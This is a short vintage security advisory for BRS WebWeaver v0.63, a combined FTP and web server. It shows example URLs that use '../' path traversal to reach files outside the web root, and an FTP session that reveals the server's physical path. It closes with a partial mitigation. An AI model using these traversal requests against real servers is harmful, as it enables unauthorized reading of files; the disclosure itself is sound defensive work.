COMMAND

    WebWeaver

SYSTEMS AFFECTED

    BRS WebWeaver v0.63

PROBLEM

    Joe Testa found following.  BRS WebWeaver v0.63 is a combined  ftp
    and web  server.   Vulnerabilities exist  in the  web server which
    allow remote  users to  break out  of the  web root using relative
    paths (ie: '..', '...').  In addition, the ftp server can be  made
    to disclose the physical path of the ftp root.

    The following URLs demonstrate the problem with the web server:

        http://localhost/syshelp/../[any file outside the web root]
        http://localhost/sysimages/../[any file outside the web root]
        http://localhost/scripts/../[any file outside the web root]

    The  following  is  an  illustration  of  the problem with the ftp
    server:

        >ftp localhost
        Connected to xxxxxxxxxxxx.rh.rit.edu.
        220 BRS WebWeaver FTP Server ready.
        User (xxxxxxxxxxxx.rh.rit.edu:(none)): jdog
        331 Password required for jdog.
        Password:
        230 User jdog logged in.
        ftp> cd *
        250 CWD command successful. "/*/" is current directory.
        ftp> ls
        200 Port command successful.
        150 Opening data connection for directory list.
        c:\windows\desktop\*\*.* not found
        226 File sent ok
        ftp: 36 bytes received in 0.06Seconds 0.60Kbytes/sec.
        ftp>

SOLUTION

    The web server root traversal vulnerabilities can be prevented  by
    removing all user-defined aliases (ie: 'syshelp', 'sysimages')  as
    well as the ISAPI/CGI alias (ie: 'scripts').  There is no solution
    for the ftp root disclosure vulnerability.